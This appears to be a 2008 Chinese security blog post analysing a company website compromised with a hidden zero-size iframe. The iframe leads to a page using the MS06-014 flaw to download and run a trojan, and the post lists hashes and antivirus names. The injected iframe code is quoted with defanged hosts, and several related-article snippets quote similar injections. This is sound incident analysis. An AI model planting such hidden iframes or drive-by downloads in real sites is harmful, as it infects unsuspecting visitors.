X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel

最新推荐文章于 2022-02-25 19:38:17 发布
最新推荐文章于 2022-02-25 19:38:17 发布
阅读量1.3k 收藏
点赞数
分类专栏: 系统安全 文章标签: vbscript 脚本 iframe asp c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/2501590
版权

X天科技有限公司网站挂马Trojan.DL.Win32.Mnless/Win32.Losabel

endurer 原创
2008-06-01 第1

网站包含代码:
/---
<iframe src="hxxp://he*i*dian*.go2.i**cp*c*n.com/wo/tzd.htm" name="zhu" width="0"height="0" frameborder="0">
---/

hxxp://he*i*dian*.go2.i**cp*c*n.com/wo/tzd.htm 是个以 VBScript 为脚本的ASP网页,输出VBScript脚本。

该脚本利用 MS06-014漏洞下载 hxxp://he*i*dian*.go2.i**cp*c*n.com/ok.exe,通过rundll32.exe来启动。


文件说明符 : D:/test/ok.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-5-29 11:28:47
修改时间 : 2008-5-29 11:28:48
访问时间 : 2008-5-29 11:29:0
大小 : 76417 字节 74.641 KB
MD5 : 8ddfa0c57a93aad29e9cd48992954596
SHA1: 5DCB4D0671898464E59FFB829D64F66359339910
CRC32: 12070808

卡巴斯基报为 Trojan-Downloader.Win32.Losabel.dy,瑞星报为 Trojan.DL.Win32.Mnless.zcd

紫郢剑侠
关注
专栏目录
一个被加入下载QQ盗号木马Trojan.PSW.QQPass.rie代码的网站
Purpleendurer@CSDN
01-30 5313
endurer 原创2007-01-30 第1版该网站首页被加入代码:/-------<IFRAME src="hxxp://***.v**1*8***0.net/qq/" frameBorder=0 width=0 height=0></IFRAME>-------/打开该URL,没有显示内容,但网页中的VBScript代码会利用 Microsoft.XMLHTTP 和 scrīpt
世界知名IT公司名字由来 一个比一个有趣
Purpleendurer@CSDN
12-24 3101
作者:佚名  来源:中国经济网I Motorola 创始人PaulGalvin是在公司开始生产车用无线电的时候让公司叫现在这个名字的。原先它叫Victrola。 Microsoft BillGate起了这个名字。表示公司将专注于MICROcomputerSOFTware(微型计算机软件),原来叫做Micro-Soft,后来把中间的“-”去掉了。 Lotus 从莲花式盘坐(padmasana)
书是怎样写成的——《ASP.NET夜话》背后的故事
热门推荐
周公(周金桥)的专栏
07-31 1万+
最初的蓝本在2007年的时候我进入一家开发公司,当时那家公司主要是以asp来开发网站,当时公司领导对我寄予了很大的希望,想我带领公司开发人员由asp转向ASP.NET,在2007年7月里我开始对公司老员工和新近员工进行ASP.NET培训,当时是上午给开发人员做培训,下午的时间则让开发人员动手做我布置的练习,我接着准备第二的知识点并制作ppt和编写示例代码,经过半个多月的培训之后就留下了一
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
Purpleendurer@CSDN
02-29 1346
某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbgendurer 原创2008-02-29 第1版1.网站首页包含代码:/---<iframe src=hxxp://pop**.i**ms**e*e*.cc/g3.htm width=100 height=0></iframe>---/1.1 hxxp://pop**.i**ms**e*e*.cc/g3.
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
Purpleendurer@CSDN
09-29 1038
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu endurer 原创2008-09-29 第1版 发现了挺久了,不过现在才有时间来分析一下。 该网页面发现代码:/---<script language="javascript" type="text/javascript" src="hx
Trojan-Downloader.Win32.Generic.a...
06-08
【病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed
09-21
描述中提到的“Cross-Platform worm-trojan (Win32 , Linux and Mac OS ) source in REALBasic”进一步确认了这是一个跨平台的蠕虫木马源代码,是用REALBasic编程语言编写的。REALBasic是一种基于Basic的集成开发...
trojan-1.16.0-win.zip
04-01
trojan
如何杀除Trojan.win32.Thsys病毒
job82824的专栏
03-25 5818
本人这几深受其害,但是最后还是终于摆脱了这个可恶的病毒的骚扰。 这个病毒像牛皮糖一样,用360/360急救箱/木马克星之类的都不能彻底杀除,因为它的传染能力较强。 其实所有的蠕虫病毒都有个共性,就是善于感染硬盘中的.dll文件和.exe文件,你发觉它的存在越晚,那它感染的文件就会越多。 以前我用这种方法对付过威金蠕虫--就是将硬盘中的所有.dll和.exe文件都搜索出来,
一个自动下载灰鸽子的网站
Purpleendurer@CSDN
05-04 2665
endurer 原创2006-05-04 第1版某网站被加入:  <iframe src="hxxp://95762.***512j.com/" width="0" height="0">   hxxp://95762.***512j.com/index的内容为:  <iframe src="hxxp://www.***kkkshop.com
谈一谈周公所理解的面试
caobihole
08-15 252
因为公司最近招聘的力度很大,所以最近公司的面试很多,加之很多同事项目紧,所以让我参加了一些技术面试。不论是作为面试官还是应聘者,参加工作以来我参与的面试的次数我自己也记不清了,所以在此想从面试官和应聘者的角度来谈谈我的面试经历和感受。 作为面试官 因为上周的事情比较近,我就先从公司最近的面试谈起。我所在的公司面试是分为四轮的,前两轮是技术面试,第三轮是英语面试(因为是外企,所以对英语要求相对较高...
巴马某神酒业有限责任公司网站挂马Worm.Win32.Downloader/Trojan.Win32.Mnless
Purpleendurer@CSDN
12-13 3097
巴马某神酒业有限责任公司网站挂马Worm.Win32.Downloader/Trojan.Win32.Mnlessendurer 原创2007-12-13 第1版检查首页代码,发现被多次加入代码:/--- ---/hxxp://A**A.ll*sging**.com/ww/new05.htm?075 包含代码:/------/hxxp://A**A.ll*sging**.
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 9080
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10智能锁项目实战第1(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3607
10智能锁项目实战第1(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 7112
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1754
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
查杀win32/Trojan.e9b变种Autorun病毒的方法
与某些其他类型的病毒,如Trojan.Generic.Is.536802不同,win32/Trojan.e9b不会记录被感染文件的最后修改时间,这使得它更加难以被检测到。病毒通过一个名为ndclb.exe的DOS文件传播,该文件仅感染EXE文件,而不改变...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值